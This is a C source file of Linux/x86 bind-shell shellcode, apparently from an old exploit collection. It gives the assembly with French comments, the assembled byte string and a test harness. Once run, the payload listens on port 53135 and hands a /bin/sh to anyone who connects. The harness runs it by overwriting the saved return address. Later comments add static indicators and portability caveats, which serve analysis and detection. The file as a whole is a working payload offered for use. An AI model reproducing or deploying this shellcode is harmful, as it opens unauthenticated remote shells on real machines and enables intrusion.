/* Exile2k's Giving
** ----------------
** This is another way to bind a shell to a port.
** Thanx to binf for the advice.
** shellcode : bind a shell to port 53135
**
*/

/*

int     main()
{
  asm("
movl %ebp, %esp
xorl %eax, %eax
movw $0x104, %ax
add  %eax, %esp
movl $0x6e69622f, (%esp)
movl $0x4268732f, 0x4(%esp)
xorl %eax, %eax
movl %eax, 0x10(%esp)
movb $0x2, 0x10(%esp)
movw $0x8fcf, 0x12(%esp)
movl %eax, 0x14(%esp)
movl $0x08049630, 0x18(%esp)
movl $0x08049644, 0x1c(%esp)
");

  // sc = socket(2, 1 ,6);

  asm("
inc  %eax
movl %eax, 0x24(%esp)
movl %eax, %ebx
inc  %eax
movl %eax, 0x20(%esp)
movb $0x6, %al
movl %eax, 0x28(%esp)
movb $0x66, %al
leal 0x20(%esp), %ecx
int  $0x80
movl %eax, 0x20(%esp)
");
  // Appel a bind(sd, &struct sockaddr, 16)
  // correction de la structure sockaddr_in codee en hard dans les data.

  asm("
leal 0x10(%esp), %ecx
movl %ecx, 0x24(%esp)
leal 0x20(%esp), %ecx
xorl %eax, %eax
movb $0x2, %al
movl %eax,%ebx
movb $0x10, %al
movl %eax, 0x28(%esp)
movb $0x66, %al
int  $0x80
");

  // appel a listen(sd, 4)

asm("
xorl %eax, %eax
movb $0x4, %al
movl %eax, %ebx
movb $0x66, %al
int  $0x80
");

// appel a fork()

 asm("
xorl %ebx,%ebx
movl %ebx,%eax
movb $0x2,%al
int  $0x80
cmp  %eax,%ebx
je   accept_it
xorl %eax,%eax
inc  %eax
int  $0x80
");
 // appel a sc = accept(sd, &client_addr,&16)

 asm("
accept_it:
leal 0x10(%esp), %ecx
movl %ecx, 0x24(%esp)
xorl %eax,%eax
movb $0x10, %al
movl %eax, 0xc(%esp)
leal 0xc(%esp), %ecx
movl %ecx, 0x28(%esp)
leal 0x20(%esp), %ecx
movb $0x66, %al
movb $0x5, %bl
int  $0x80
movl %eax, 0x2c(%esp)
");

 // appel au fork()

 asm("
xorl %ebx, %ebx
xorl %eax, %eax
movb $0x2, %al
int  $0x80
cmp  %eax, %ebx
je   launch
movl 0x2c(%esp), %ebx
xorl %eax, %eax
movb $0x6, %al
int  $0x80
jmp  accept_it
");

 // associe stdin,stdout et stderr a la socket avec dup2()

 asm("
launch:
movl 0x2c(%esp), %ebx
xorl %ecx,%ecx
movb $0x3f, %al
int  $0x80
xorl %eax,%eax
movb $0x3f, %al
inc  %ecx
int  $0x80
xorl %eax,%eax
movb $0x3f, %al
inc  %ecx
int  $0x80
");

 // execve("/bin/sh","/bin/sh",0,0);

 asm("
xorl %eax, %eax
movb %al, 0x7(%esp)
mov  %esp, 0x8(%esp)
mov  %eax, 0xC(%esp)
mov  %esp, %ebx
lea  0x8(%esp), %ecx
lea  0xc(%esp), %edx
movb $0xb, %al
int  $0x80
xorl %ebx, %ebx
movl %ebx, %eax
inc  %eax
int  $0x80
");

}

*/

/*
** Linux/x86 machine code for the commented-out asm above: socket/bind/listen
** (via socketcall, int $0x80), fork, an accept loop, three dup2 calls and
** execve. Notes for anyone analysing the blob:
**  - The listening port 53135 is the pair \xcf\x8f (0x8fcf in network byte
**    order) on the third line; "/bin" and "/sh" appear as \x2f\x62\x69\x6e and
**    \x2f\x73\x68 on the first two lines. Together with the repeated \xcd\x80
**    these are the obvious static indicators for this payload.
**  - Two absolute words, 0x08049630 and 0x08049644 (\x30\x96\x04\x08 and
**    \x44\x96\x04\x08), are baked in. Per the asm they are stored at
**    0x18(%esp) and 0x1c(%esp), i.e. the last 8 bytes of the 16-byte sockaddr
**    handed to bind, and are not otherwise referenced -- presumably leftover
**    padding; confirm before drawing conclusions from them.
**  - The string-literal form appends a terminating '\0'; main() measures the
**    payload with strlen(), which only works because no byte here is 0x00.
*/
char    shellcode[] =
"\x89\xec\x31\xc0\x66\xb8\x04\x01\x01\xc4\xc7\x04\x24\x2f\x62\x69\x6e"
"\xc7\x44\x24\x04\x2f\x73\x68\x42\x31\xc0\x89\x44\x24\x10\xc6\x44\x24"
"\x10\x02\x66\xc7\x44\x24\x12\xcf\x8f\x89\x44\x24\x14\xc7\x44\x24\x18"
"\x30\x96\x04\x08\xc7\x44\x24\x1c\x44\x96\x04\x08\x40\x89\x44\x24\x24"
"\x89\xc3\x40\x89\x44\x24\x20\xb0\x06\x89\x44\x24\x28\xb0\x66\x8d\x4c"
"\x24\x20\xcd\x80\x89\x44\x24\x20\x8d\x4c\x24\x10\x89\x4c\x24\x24\x8d"
"\x4c\x24\x20\x31\xc0\xb0\x02\x89\xc3\xb0\x10\x89\x44\x24\x28\xb0\x66"
"\xcd\x80\x31\xc0\xb0\x04\x89\xc3\xb0\x66\xcd\x80\x31\xdb\x89\xd8\xb0"
"\x02\xcd\x80\x39\xc3\x74\x05\x31\xc0\x40\xcd\x80\x8d\x4c\x24\x10\x89"
"\x4c\x24\x24\x31\xc0\xb0\x10\x89\x44\x24\x0c\x8d\x4c\x24\x0c\x89\x4c"
"\x24\x28\x8d\x4c\x24\x20\xb0\x66\xb3\x05\xcd\x80\x89\x44\x24\x2c\x31"
"\xdb\x31\xc0\xb0\x02\xcd\x80\x39\xc3\x74\x0c\x8b\x5c\x24\x2c\x31\xc0"
"\xb0\x06\xcd\x80\xeb\xc2\x8b\x5c\x24\x2c\x31\xc9\xb0\x3f\xcd\x80\x31"
"\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\x88\x44"
"\x24\x07\x89\x64\x24\x08\x89\x44\x24\x0c\x89\xe3\x8d\x4c\x24\x08\x8d"
"\x54\x24\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80";

/*
** Test harness for the blob above. This listing includes neither <stdio.h>
** nor <string.h>, so printf and strlen are implicitly declared (dropped from
** the language in C99; modern compilers warn or reject), and "%i" is paired
** with a size_t result -- use "%zu" if this is ever rebuilt.
*/
int     main(int argc, char **argv)
{
  int   *b;

  printf("%i\n", strlen(shellcode));
  /* Take the address of the local and step two words up the frame. On the
  ** compiler/ABI this was written for that slot held the saved return
  ** address; nothing guarantees that layout (frame pointer, padding, stack
  ** protector), so on another toolchain this may simply corrupt an unrelated
  ** slot and crash. */
  b = (int *) &b + 2;
  /* A cast applied to an lvalue -- a GCC extension, not standard C. The
  ** intent is to store the address of shellcode into the slot b points at so
  ** that this function's own `return` lands in the blob. */
  (char *) *b = shellcode;
  printf("telnet to port 53135 to have phun\n"
         "And don't forget to kill all %s running\n", argv[0]);
  return 0;

}
